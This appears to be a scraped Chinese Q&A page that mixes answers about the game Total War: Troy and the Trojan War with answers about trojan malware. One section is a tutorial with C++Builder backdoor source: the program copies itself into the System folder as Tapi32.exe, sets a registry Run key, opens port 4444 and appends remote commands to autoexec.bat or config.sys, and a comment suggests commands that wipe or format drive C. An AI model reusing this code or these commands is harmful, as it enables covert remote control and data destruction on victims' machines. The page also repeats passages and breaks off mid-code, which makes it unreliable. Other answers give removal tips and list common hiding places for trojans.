全面戰爭特洛伊如何操作

㈠ 怎麼殺特洛伊木馬

你好~首先明確一個問題:我不是"高手",所以我只能在我目前的
知識水平
內盡量幫你解決你的問題.
--------------------------------------------------------------
問題關鍵字:上網的時候，卡巴突然跳出來說有病毒，要處理...
根據你的描寫,我可以猜想這個病毒是
流行病毒
了.因為殺毒軟體的原理是先收集有關病毒的
特徵碼
存入資料庫,既而和可疑文件進行比對,如果特徵碼相同,就認為它是病毒.這樣的最大弊端就是:新出的病毒殺毒軟體會認不出,所以
殺軟
會要求我們常常更新
病毒庫
.修改了特徵碼的病毒殺毒軟體會認不出,這就是常說的變種.
問題關鍵字:一按就跳出來說1分鍾後
自動關機
...
關機可能是2種原因造成的[我的知識范圍內的理解]一:病毒擁有自我保護技術,如果殺軟試圖刪除和停止病毒的運行,則會激活病毒的保護功能.二:病毒注入到了系統關鍵進程內,要停止病毒需要停止系統關鍵進程,這樣的話當然會關機了.
解決方案:由於你提供的資料實在有限,所以我不能想當然的提出解決方案.我的建議是:既然卡巴能認出來,說明這個病毒已經離滅亡不遠了.根據卡巴提供的病毒信息,上網路或
google搜索
該病毒的解決方案.[可能要求你具有
手工殺毒
的基本技術]如果實在不行,重裝或許是我能給你提供的最後一招了.
最後:病毒現在一般都具有感染性,exe,html,rar這些常用文件格式都可以或可能已經被感染.怎樣識別我也很難說清楚,建議:打開[我的電腦]-[工具]-[
文件夾選項
]-[查看]-去掉[隱藏受保護的操作系統文件(推薦)]的勾-點選[顯示所有文件和文件夾].然後看看你C,D,E..各個
盤符
下有沒有一個名為autorun.inf這的文件,如果有,你很可能中病毒了[如果你不知道它是什麼的話].
殺不目的,防才是關鍵.
我由於好奇經常會去點擊各種
木馬病毒
,為了
保護我的愛
機.
我採取了以下的辦法.[參考]
你可以找個你認識的懂電腦的朋友或者
電腦維修
員,讓他看看我的辦法.
或許你也可以想我這樣.中病毒幾乎是不可能了[呵呵,美好心願吧]
找張干凈的
系統盤
,安裝.[我是
C盤
]
既而安裝你需要的常用軟體.[最好別和系統盤安裝在一起.][我是D盤]
然後用GHOST備份下.
安裝
冰點還原
或是別的,建議安裝這個.[還原C,D盤]
在除C'D盤的其他盤下建立命為autorun.inf的文件夾.
OK,冰點保護,關機所有操作恢復.GHOST以防萬一.
水平有限,精力有限,只能提供如此了.
希望你能將你的知識幫助你能幫助的人.

㈡ 特洛伊戰爭的全過程是什麼

Helen should take the responsibility of the war!
Because of her pursuit of love,she made the war between the two countries(I can hardly remember clearly the counties' names.)
As I have told you, the war began as Helen left the King and pursued the Prince of the country,which was named Troy.Once the king got the news he was so angry that once he saw Helen he would kill her instantly.What was worse ,the King regarded that Helen's mistakes should be paied by the people of the Troy.And then the war came,a famouse war widely influenced.
經過就不用講了吧(簡略點吧),Majority of the King's army came to attack the Troy,and by the commander of a famouse fighter(也就是皮特主演的戰士),they won the war eventually.

㈢ 請問特洛伊木馬怎麼殺

你好~首先明確一個問題:我不是"高手",所以我只能在我目前的知識水平內盡量幫你解決你的問題.
--------------------------------------------------------------
問題關鍵字:上網的時候，卡巴突然跳出來說有病毒，要處理...
根據你的描寫,我可以猜想這個病毒是流行病毒了.因為殺毒軟體的原理是先收集有關病毒的特徵碼存入資料庫,既而和可疑文件進行比對,如果特徵碼相同,就認為它是病毒.這樣的最大弊端就是:新出的病毒殺毒軟體會認不出,所以殺軟會要求我們常常更新病毒庫.修改了特徵碼的病毒殺毒軟體會認不出,這就是常說的變種.

問題關鍵字:一按就跳出來說1分鍾後自動關機...
關機可能是2種原因造成的[我的知識范圍內的理解]一:病毒擁有自我保護技術,如果殺軟試圖刪除和停止病毒的運行,則會激活病毒的保護功能.二:病毒注入到了系統關鍵進程內,要停止病毒需要停止系統關鍵進程,這樣的話當然會關機了.

解決方案:由於你提供的資料實在有限,所以我不能想當然的提出解決方案.我的建議是:既然卡巴能認出來,說明這個病毒已經離滅亡不遠了.根據卡巴提供的病毒信息,上網路或google搜索該病毒的解決方案.[可能要求你具有手工殺毒的基本技術]如果實在不行,重裝或許是我能給你提供的最後一招了.

最後:病毒現在一般都具有感染性,exe,html,rar這些常用文件格式都可以或可能已經被感染.怎樣識別我也很難說清楚,建議:打開[我的電腦]-[工具]-[文件夾選項]-[查看]-去掉[隱藏受保護的操作系統文件(推薦)]的勾-點選[顯示所有文件和文件夾].然後看看你C,D,E..各個盤符下有沒有一個名為autorun.inf這的文件,如果有,你很可能中病毒了[如果你不知道它是什麼的話].
殺不目的,防才是關鍵.
我由於好奇經常會去點擊各種木馬病毒,為了保護我的愛機.
我採取了以下的辦法.[參考]
你可以找個你認識的懂電腦的朋友或者電腦維修員,讓他看看我的辦法.
或許你也可以想我這樣.中病毒幾乎是不可能了[呵呵,美好心願吧]
找張干凈的系統盤,安裝.[我是C盤]
既而安裝你需要的常用軟體.[最好別和系統盤安裝在一起.][我是D盤]
然後用GHOST備份下.
安裝冰點還原或是別的,建議安裝這個.[還原C,D盤]
在除C'D盤的其他盤下建立命為autorun.inf的文件夾.
OK,冰點保護,關機所有操作恢復.GHOST以防萬一.

水平有限,精力有限,只能提供如此了.
希望你能將你的知識幫助你能幫助的人.

㈣ 這個配置能玩全面戰爭特洛伊嘛

你好，全面戰爭特洛伊的配置要求比較低。你的電腦配置滿足基礎配置要求，可以遊玩。另外，今天應該可以在epic免費領取這款游戲，請抓緊時間領取。

㈤ 全面戰爭特洛伊會和自己的弟弟宣戰嗎

暫時先不要，先把老國王的特洛伊城拿到再說，如果你沒拿到那隻能宣戰了

㈥ 特洛伊木馬攻擊步驟及原理

特洛伊是具有某些功能或僅僅是有趣的程序。但它通常會做一些令人意想不到的事情，如盜取口令或文件。

特洛伊是如何工作的

一般的木馬程序都包括客戶端和服務端兩個程序，其申客戶端是用於攻擊者遠程式控制制植入木馬的機器，伺服器端程序即是木馬程序。攻擊者要通過木馬攻擊你的系統，他所做的第一步是要把木馬的伺服器端程序植人到你的電腦裡面。 [內容來自"華西黑客聯盟"]

目前木馬的主要途徑還是先通過一定的方法把木馬執行文件弄到被攻擊者的電腦系統里，利用的途徑有郵件附件、下載軟體中等，然後通過一定的提示故意誤導被攻擊者打開執行文件，比如故意謊稱這個木馬執行文件，是你朋友送給你賀卡，可能你打開這個文件後，確實有賀卡的畫面出現，但這時可能木馬已經悄悄在你的後台運行了。一般的木馬執行文件非常小，大部分都是幾K到幾十K，如果把木馬捆綁到其他正常文件上，你很難發現，所以，有一些網站提供的往往是捆綁了木馬文件的，你執行這些下載的文件，也同時運行了木馬。

木馬也可以通過Script、ActiveX及Asp.CGI交互腳本的方式植入，由於微軟的瀏覽器在執行Senipt腳本存在一些漏洞。攻擊者可以利用這些漏洞傳播病毒和木馬，甚至直接對瀏覽者電腦進行文件操作等控制。前不久獻出現一個利用微軟Scripts腳本漏洞對瀏覽者硬碟進行格式化的HTML頁面。如果攻擊者有辦法把木馬執行文件下載到攻擊主機的一個可執行WWW目錄夾裡面，他可以通過編制CGI程序在攻擊主機上執行木馬目錄。此外，木馬還可以利用系統的一些漏洞進行植人，如微軟著名的US伺服器溢出，通過一個IISHACK攻擊程序即可使IIS伺服器崩潰，並且同時攻擊伺服器，執行遠程木馬執行文件。 www.

當服務端程序在被感染的機器上成功運行以後，攻擊者就可以使用客戶端與服務端建立連接，並進一步控制被感染的機器。在客戶端和服務端通信協議的選擇上，絕大多數木馬使用的是TCP/IP協議，但是也有一些木馬由於特殊的原因，使用UDP協議進行通訊。當服務端在被感染機器上運行以後，它一方面盡量把自己隱藏在計算機的某個角落裡面，以防被用戶發現;同時監聽某個特定的埠，等待客戶端與其取得連接;另外為了下次重啟計算機時仍然能正常工作。木馬程序一般會通過修改注冊表或者其他的方法讓自己成為自啟動程序

㈦ 怎樣安裝特洛伊全面戰爭

http://www.39d.com.cn/zzcl/youmyth/List_1.html

㈧ 全面戰爭特洛伊步兵可以組成盾牆嗎

全面戰爭裡面的特洛伊步兵的話是可以組成一個對象的，首先你要把他震醒給擺好就可以了。

㈨ 誰知道怎麼編寫特洛伊木馬程序

特洛依木馬這個名詞大家應該不陌生，自從98年「死牛崇拜」黑客小組公布Back Orifice以來，木馬猶如平地上的驚雷， 使在Dos??Windows時代中長大的中國網民從五彩繽紛的網路之夢中驚醒，終於認識到的網路也有它邪惡的一面，一時間人心惶惶。

我那時在《電腦報》上看到一篇文章，大意是一個菜鳥被人用BO控制了，嚇得整天吃不下飯、睡不著覺、上不了網，到處求救！要知道，木馬（Trojan）的歷史是很悠久的：早在AT&T Unix和BSD Unix十分盛行的年代，木馬是由一些玩程式（主要是C）水平很高的年輕人（主要是老美）用C或Shell語言編寫的，基本是用來竊取登陸主機的口令，以取得更高的許可權。那時木馬的主要方法是誘騙??先修改你的.profile文件，植入木馬；當你登陸時將你敲入的口令字元存入一個文件，用Email的形式發到攻擊者的郵箱里。國內的年輕人大都是在盜版Dos的熏陶下長大的，對網路可以說很陌生。直到Win9x橫空出世，尤其是WinNt的普及，大大推動了網路事業的發展的時候，BO這個用三年後的眼光看起來有點簡單甚至可以說是簡陋的木馬（甚至在Win9x的「關閉程序」對話框可以看到進程）給了當時中國人極大的震撼，它在中國的網路安全方面可以說是一個劃時代的軟體。

自己編寫木馬，聽起來很Cool是不是？！木馬一定是由兩部分組成??伺服器程序（Server）和客戶端程序（Client），伺服器負責打開攻擊的道路，就像一個內奸特務；客戶端負責攻擊目標，兩者需要一定的網路協議來進行通訊（一般是TCP/IP協議）。為了讓大家更好的了解木馬攻擊技術，破除木馬的神秘感，我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬，使大家能更好地防範和查殺各種已知和未知的木馬。

首先是編程工具的選擇。目前流行的開發工具有C++Builder、VC、VB和Delphi，這里我們選用C++Builder（以下簡稱BCB）；VC雖然好，但GUI設計太復雜，為了更好地突出我的例子，集中注意力在木馬的基本原理上，我們選用可視化的BCB；Delphi也不錯，但缺陷是不能繼承已有的資源（如「死牛崇拜」黑客小組公布的BO2000源代碼，是VC編寫的，網上俯拾皆是）；VB嘛，談都不談??難道你還給受害者傳一個1兆多的動態鏈接庫??Msvbvm60.dll嗎？

特洛依木馬這個名詞大家應該不陌生，自從98年「死牛崇拜」黑客小組公布Back Orifice以來，木馬猶如平地上的驚雷， 使在Dos??Windows時代中長大的中國網民從五彩繽紛的網路之夢中驚醒，終於認識到的網路也有它邪惡的一面，一時間人心惶惶。

我那時在《電腦報》上看到一篇文章，大意是一個菜鳥被人用BO控制了，嚇得整天吃不下飯、睡不著覺、上不了網，到處求救！要知道，木馬（Trojan）的歷史是很悠久的：早在AT&T Unix和BSD Unix十分盛行的年代，木馬是由一些玩程式（主要是C）水平很高的年輕人（主要是老美）用C或Shell語言編寫的，基本是用來竊取登陸主機的口令，以取得更高的許可權。那時木馬的主要方法是誘騙??先修改你的.profile文件，植入木馬；當你登陸時將你敲入的口令字元存入一個文件，用Email的形式發到攻擊者的郵箱里。國內的年輕人大都是在盜版Dos的熏陶下長大的，對網路可以說很陌生。直到Win9x橫空出世，尤其是WinNt的普及，大大推動了網路事業的發展的時候，BO這個用三年後的眼光看起來有點簡單甚至可以說是簡陋的木馬（甚至在Win9x的「關閉程序」對話框可以看到進程）給了當時中國人極大的震撼，它在中國的網路安全方面可以說是一個劃時代的軟體。

自己編寫木馬，聽起來很Cool是不是？！木馬一定是由兩部分組成??伺服器程序（Server）和客戶端程序（Client），伺服器負責打開攻擊的道路，就像一個內奸特務；客戶端負責攻擊目標，兩者需要一定的網路協議來進行通訊（一般是TCP/IP協議）。為了讓大家更好的了解木馬攻擊技術，破除木馬的神秘感，我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬，使大家能更好地防範和查殺各種已知和未知的木馬。

首先是編程工具的選擇。目前流行的開發工具有C++Builder、VC、VB和Delphi，這里我們選用C++Builder（以下簡稱BCB）；VC雖然好，但GUI設計太復雜，為了更好地突出我的例子，集中注意力在木馬的基本原理上，我們選用可視化的BCB；Delphi也不錯，但缺陷是不能繼承已有的資源（如「死牛崇拜」黑客小組公布的BO2000源代碼，是VC編寫的，網上俯拾皆是）；VB嘛，談都不談??難道你還給受害者傳一個1兆多的動態鏈接庫??Msvbvm60.dll嗎？

接著再將自己拷貝一份到%System%目錄下，例如：C:WindowsSystem，並修改注冊表，以便啟動時自動載入：

{
char TempPath[MAX_PATH];
//定義一個變數
GetSystemDirectory（TempPath ,MAX_PATH）;
//TempPath是system目錄緩沖區的地址,MAX_PATH是緩沖區的大小，得到目標機的System目錄路徑
SystemPath=AnsiString（TempPath）;
//格式化TempPath字元串，使之成為能供編譯器使用的樣式
CopyFile（ParamStr（0）.c_str（）, AnsiString（SystemPath+"\Tapi32.exe"）.c_str（） ,FALSE）;
//將自己拷貝到%System%目錄下，並改名為Tapi32.exe，偽裝起來
Registry=new TRegistry;
//定義一個TRegistry對象，准備修改注冊表，這一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
//設置主鍵為HKEY_LOCAL_MACHINE
Registry->OpenKey（"Software\Microsoft\Windows\
CurrentVersion\Run",TRUE）;
//打開鍵值Software\Microsoft\Windows\CurrentVersion\Run，如果不存在，就創建之
try
{
//如果以下語句發生異常，跳至catch，以避免程序崩潰
if（Registry->ReadString（"crossbow"）!=SystemPath+"\Tapi32.exe"）
Registry->WriteString（"crossbow",SystemPath+"\Tapi32.exe"）;
//查找是否有「crossbow」字樣的鍵值，並且是否為拷貝的目錄%System%+Tapi32.exe
//如果不是，就寫入以上鍵值和內容
}
catch（...）
{
//如果有錯誤，什麼也不做
}
}

好，FormCreate過程完成了，這樣每次啟動都可以自動載入Tapi32.exe，並且在「關閉程序」對話框中看不見本進程了，木馬的雛形初現。

接著選中ServerSocket控制項，在左邊的Object Inspector中將Active改為true，這樣程序一啟動就打開特定埠，處於伺服器工作狀態。再將Port填入4444，這是木馬的埠號，當然你也可以用別的。但是你要注意不要用1024以下的低端埠，因為這樣不但可能會與基本網路協議使用的埠相沖突，而且很容易被發覺，因此盡量使用1024以上的高端埠（不過也有這樣一種技術，它故意使用特定埠，因為如果引起沖突，Windows也不會報錯 ^_^）。你可以看一看TNMFTP控制項使用的埠，是21號埠，這是FTP協議的專用控制埠（FTP Control Port）；同理TNMSMTP的25號埠也是SMTP協議的專用埠。

再選中ServerSocket控制項，點擊Events頁，雙擊OnClientRead事件，敲入以下代碼：

{
FILE *fp=NULL;
char * content;
int times_of_try;
char TempFile[MAX_PATH];
//定義了一堆待會兒要用到的變數
sprintf（TempFile, "%s", AnsiString（SystemPath+AnsiString（"\Win369.BAT"））.c_str（））;
//在%System%下建立一個文本文件Win369.bat，作為臨時文件使用
AnsiString temp=Socket->ReceiveText（）;
//接收客戶端（攻擊者，也就是你自己）傳來的數據

好，大門敞開了！接著就是修改目標機的各種配置了！^_^ 首先我們來修改Autoexec.bat和Config.sys吧：

{
if（temp.SubString（0,9）=="edit conf"）
//如果接受到的字元串的前9個字元是「edit conf」
{
int number=temp.Length（）;
//得到字元串的長度
int file_name=atoi（（temp.SubString（11,1））.c_str（））;
//將第11個字元轉換成integer型，存入file_name變數
//為什麼要取第11個字元，因為第10個字元是空格字元
content=（temp.SubString（12,number{
if（temp.SubString（0,9）=="edit conf"）
//如果接受到的字元串的前9個字元是「edit conf」
{
int number=temp.Length（）;
//得到字元串的長度
int file_name=atoi（（temp.SubString（11,1））.c_str（））;
//將第11個字元轉換成integer型，存入file_name變數
//為什麼要取第11個字元，因為第10個字元是空格字元
content=（temp.SubString（12,number-11）+' '）.c_str（）;
//餘下的字元串將被作為寫入的內容寫入目標文件
FILE *fp=NULL;
char filename[20];
chmod（"c:\autoexec.bat",S_IREAD|S_IWRITE）;
chmod（"c:\config.sys",S_IREAD|S_IWRITE）;
//將兩個目標文件的屬性改為可讀可寫
if（file_name==1）
sprintf（filename,"%s","c:\autoexec.bat"）;
//如果第11個字元是1,就把Autoexec.bat格式化
else if（file_name==2）
sprintf（filename,"%s","c:\config.sys"）;
//如果第11個字元是1,就把Config.sys格式化
times_of_try=0;
//定義計數器
while（fp==NULL）
{
//如果指針是空
fp=fopen（filename,"a+"）;
//如果文件不存在，創建之；如果存在，准備在其後添加
//如果出錯，文件指針為空，這樣就會重復
times_of_try=times_of_try+1;
//計數器加1
if（times_of_try>100）
{
//如果已經試了100次了，仍未成功
Socket->SendText（"Fail By Open File"）;
//就發回「Fail By Open File」的錯誤信息
goto END;
//跳至END處
}
}
fwrite（content,sizeof（char）,strlen（content）,fp）;
//寫入添加的語句，例如deltree/y C:或者format/q/autotest C:，夠毒吧？！
fclose（fp）;
//寫完後關閉目標文件
Socket->SendText（"Sucess"）;
//然後發回「Success」的成功信息
}
}

㈩ 特洛伊木馬是如何啟動的

木馬是一種基於遠程式控制制的病毒程序，該程序具有很強的隱蔽性和危害性，它可以在人不知鬼不覺的狀態下控制你或者監視你。有人說，既然木馬這么厲害，那我離它遠一點不就可以了！然而這個木馬實在是「淘氣」，它可不管你是否歡迎，只要它高興，它就會想法設法地闖到你「家」中來的！哎呀，那還了得，趕快看看自己的電腦中有沒有木馬，說不定正在「家」中興風作浪呢！那我怎麼知道木馬在哪裡呢，相信不熟悉木馬的菜鳥們肯定想知道這樣的問題。下面就是木馬潛伏的詭招，看了以後不要忘記採取絕招來對付這些損招喲！

1、集成到程序中其實木馬也是一個伺服器-客戶端程序，它為了不讓用戶能輕易地把它刪除，就常常集成到程序里，一旦用戶激活木馬程序，那麼木馬文件和某一應用程序捆綁在一起，然後上傳到服務端覆蓋原文件，這樣即使木馬被刪除了，只要運行捆綁了木馬的應用程序，木馬又會被安裝上去了。綁定到某一應用程序中，如綁定到系統文件，那麼每一次Windows啟動均會啟動木馬。

2、隱藏在配置文件中木馬實在是太狡猾，知道菜鳥們平時使用的是圖形化界面的操作系統，對於那些已經不太重要的配置文件大多數是不聞不問了，這正好給木馬提供了一個藏身之處。而且利用配置文件的特殊作用，木馬很容易就能在大家的計算機中運行、發作，從而偷窺或者監視大家。不過，現在這種方式不是很隱蔽，容易被發現，所以在Autoexec.bat和Config.sys中載入木馬程序的並不多見，但也不能因此而掉以輕心哦。

3、潛伏在Win.ini中木馬要想達到控制或者監視計算機的目的，必須要運行，然而沒有人會傻到自己在自己的計算機中運行這個該死的木馬。當然，木馬也早有心理准備，知道人類是高智商的動物，不會幫助它工作的，因此它必須找一個既安全又能在系統啟動時自動運行的地方，於是潛伏在Win.ini中是木馬感覺比較愜意的地方。大家不妨打開Win.ini來看看，在它的[windows]欄位中有啟動命令「load=」和「run=」，在一般情況下「＝」後面是空白的，如果有後跟程序，比方說是這個樣子：run=c:＼windows＼file.exeload=c:＼windows＼file.exe這時你就要小心了，這個file.exe很可能是木馬哦。

4、偽裝在普通文件中這個方法出現的比較晚，不過現在很流行，對於不熟練的windows操作者，很容易上當。具體方法是把可執行文件偽裝成圖片或文本----在程序中把圖標改成Windows的默認圖片圖標,再把文件名改為*.jpg.exe,由於Win98默認設置是"不顯示已知的文件後綴名",文件將會顯示為*.jpg,不注意的人一點這個圖標就中木馬了(如果你在程序中嵌一張圖片就更完美了)。5、內置到注冊表中上面的方法讓木馬著實舒服了一陣，既沒有人能找到它，又能自動運行，真是快哉！然而好景不長，人類很快就把它的馬腳揪了出來，並對它進行了嚴厲的懲罰！但是它還心有不甘，總結了失敗教訓後，認為上面的藏身之處很容易找，現在必須躲在不容易被人發現的地方，於是它想到了注冊表！的確注冊表由於比較復雜，木馬常常喜歡藏在這里快活，趕快檢查一下，有什麼程序在其下，睜大眼睛仔細看了，別放過木馬哦：HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion下所有以「run」開頭的鍵值；HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion下所有以「run」開頭的鍵值；HKEY-USERS＼.Default＼Software＼Microsoft＼Windows＼CurrentVersion下所有以「run」開頭的鍵值

6、在System.ini中藏身木馬真是無處不在呀！什麼地方有空子，它就往哪裡鑽！這不，Windows安裝目錄下的System.ini也是木馬喜歡隱蔽的地方。還是小心點，打開這個文件看看，它與正常文件有什麼不同，在該文件的[boot]欄位中，是不是有這樣的內容，那就是shell=Explorer.exefile.exe，如果確實有這樣的內容，那你就不幸了，因為這里的file.exe就是木馬服務端程序！另外，在System.ini中的[386Enh]欄位，要注意檢查在此段內的「driver=路徑＼程序名」，這里也有可能被木馬所利用。再有，在System.ini中的[mic]、[drivers]、[drivers32]這三個欄位，這些段也是起到載入驅動程序的作用，但也是增添木馬程序的好場所，現在你該知道也要注意這里嘍。

7、隱形於啟動組中有時木馬並不在乎自己的行蹤，它更注意的是能否自動載入到系統中，因為一旦木馬載入到系統中，任你用什麼方法你都無法將它趕跑(哎，這木馬臉皮也真是太厚)，因此按照這個邏輯，啟動組也是木馬可以藏身的好地方，因為這里的確是自動載入運行的好場所。動組對應的文件夾為：C:＼windows＼startmenu＼programs＼startup，在注冊表中的位置：HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼Explorer＼ShellFoldersStartup="C:＼windows＼startmenu＼programs＼startup"。要注意經常檢查啟動組哦！

8、隱蔽在Winstart.bat中按照上面的邏輯理論，凡是利於木馬能自動載入的地方，木馬都喜歡呆。這不，Winstart.bat也是一個能自動被Windows載入運行的文件，它多數情況下為應用程序及Windows自動生成，在執行了Win.com並載入了多數驅動程序之後開始執行(這一點可通過啟動時按F8鍵再選擇逐步跟蹤啟動過程的啟動方式可得知)。由於Autoexec.bat的功能可以由Winstart.bat代替完成，因此木馬完全可以像在Autoexec.bat中那樣被載入運行，危險由此而來。

9、捆綁在啟動文件中即應用程序的啟動配置文件，控制端利用這些文件能啟動程序的特點，將製作好的帶有木馬啟動命令的同名文件上傳到服務端覆蓋這同名文件，這樣就可以達到啟動木馬的目的了。

10、設置在超級連接中木馬的主人在網頁上放置惡意代碼，引誘用戶點擊，用戶點擊的結果不言而喻：開門揖盜！奉勸不要隨便點擊網頁上的鏈接，除非你了解它，信任它，為它死了也願意等等